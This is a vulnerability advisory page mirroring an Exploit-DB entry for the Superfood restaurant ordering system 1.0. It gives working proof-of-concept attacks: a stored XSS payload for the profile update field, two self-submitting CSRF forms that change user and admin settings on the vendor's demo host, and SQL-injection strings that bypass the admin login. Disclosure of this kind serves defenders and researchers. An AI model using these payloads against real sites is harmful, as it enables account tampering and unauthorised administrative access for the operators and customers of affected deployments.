Superfood - Restaurants & Online Food Order System 1.0 - Persistent cross site scripting / Cross site request forgery / Admin panel Authentication bypass

vendor:

Superfood - Restaurants & Online Food Order System

by:

Borna nematzadeh (L0RD)

6.8

CVSS

MEDIUM

Persistent cross site scripting / Cross site request forgery / Admin panel Authentication bypass

79, 352, 287

CWE

Product Name: Superfood - Restaurants & Online Food Order System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:codecanyon:superfood_restaurants_online_food_order_system

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Kali Linux

2018

Superfood – Restaurants & Online Food Order System 1.0 – Persistent cross site scripting / Cross site request forgery / Admin panel Authentication bypass

Superfood - Restaurants & Online Food Order System 1.0 suffers from multiple vulnerabilities. For Persistent cross site scripting, after creating an account, go to the profile and navigate to 'Update profile' and put the payload '/><script>alert('xss')</script>. For CSRF, attacker can change user's authentication directly. For Admin panel Authentication bypass, go to http://restaurant.thesoftking.com/admin and put the payload 'admin'-- in the username field.

Mitigation:

Implement input validation, use of secure authentication, and use of secure communication protocols.

Source

Exploit-DB raw data:

# Exploit Title:  Superfood - Restaurants & Online Food Order System  1.0 - Persistent cross site scripting / Cross site request forgery / Admin panel Authentication bypass
# Date: 2018-05-20
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://codecanyon.net/item/superfood-restaurants-online-food-order-system/16855836?s_rank=30
# Version: 1.0
# Tested on: Kali linux
====================================================
# Description:
Superfood - Restaurants & Online Food Order System 1.0 suffers from multiple vulnerabilities :
====================================================
# POC 1 : Persistent cross site scripting :
1) After creating an account , go to your profile.
2) Navigate to "Update profile" and put this payload :
"/><script>alert('xss')</script>
3) You will have an alert box in the page .
====================================================
# POC 2 : CSRF :
Attacker can change user's authentication directly :
# User's CSRF exploit :
<html>
<head>
    <title>CSRF POC</title>
</head>
<body>
    <form action="http://restaurant.thesoftking.com/updateprofile"
method="post">
        <input type="hidden" name="name" value="anything">
        <input type="hidden" name="mobile" value="1000000000">
        <input type="hidden" name="address" value="anything">
    </form>
    <script>
        document.forms[0].submit();
    </script>
</body>
</html>

# Admin page CSRF exploit :

<form action="http://restaurant.thesoftking.com/admin/setgeneral.php"
method="post">
        <input name="name" value="exploit" type="hidden">
        <input name="wcmsg" value="test" type="hidden">
        <input name="address" value="test2" type="hidden">
        <input name="mobile" value="1000000" type="hidden">
        <input name="email" value="test@test.com" type="hidden">
        <input name="currency" value="decode" type="hidden">
</form>
    <script>
         document.forms[0].submit();
    </script>
====================================================
# POC 3 : Authentication bypass :
# Attacker can bypass admin panel without any authentication :
Path : /admin
Username : ' or 0=0 #
Password : anything
====================================================